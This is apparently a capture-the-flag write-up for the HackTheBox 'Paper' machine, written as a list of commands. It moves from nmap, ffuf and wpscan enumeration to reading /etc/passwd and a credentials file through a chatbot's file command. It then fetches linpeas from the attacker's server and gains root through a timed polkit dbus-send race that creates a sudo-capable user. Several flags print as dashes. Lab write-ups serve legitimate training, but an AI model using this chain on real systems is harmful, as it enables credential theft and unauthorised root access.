Hackthebox Paper-Write up

Discovery

nmap -sV -A -O -p- 10.129.106.243
Mind my Joplin screenshots
nmap -sC -sV -sU 10.129.106.243
nikto -h http://10.129.106.243
vi /etc/hosts
:wq #or kill your VM to exit vi:)
/etc/hosts file
ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://office.paper/FUZZ
git clone https://github.com/danielmiessler/SecLists.git
Again with the Joplin output
wpscan — url http://office.paper/ — api-token <TOKEN HERE> — enumerate p,u — plugins-detection aggressive

Initial Access

Rocket chat on paper
recyclops file sale/portfolio.txt /etc/passwd 
#take note of the space
recyclops list sale /home
Again take note of the space.
recyclops file sale/portfolio.txt /home/dwight/hubot/.env
ssh dwight@10.129.106.243

Privilege Escalation

python -m SimpleHTTPServer 80
wget http://10.10.14.28/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
Polkit with SUID bit set
dbus-send — system — dest=org.freedesktop.Accounts — type=method_call — print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:”Boris Ivanovich Grishenko” int32:1
#create hashed password
openssl passwd -5 mynamejeff
$5$vJQMgDBrrOULragn$AHhV2h0GEpCnj5CiVTjuhxL5QFUjB/b/VqEtxVRzhN0
#Dbus send to set password for boris
dbus-send — system — dest=org.freedesktop.Accounts — type=method_call — print-reply /org/freedesktop/Accounts/User1005 org.freedesktop.Accounts.User.SetPassword string:’$5$vJQMgDBrrOULragn$AHhV2h0GEpCnj5CiVTjuhxL5QFUjB/b/VqEtxVRzhN0’ string:GoldenEye & sleep 0.008s ; kill $!
su boris
sudo-i

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
KonEcho

KonEcho

1 Follower

I'm a Red/blue Teamer, who loves learning all that the lovely world of cyber has to offer. This blog is Help share anything I learn along my journey!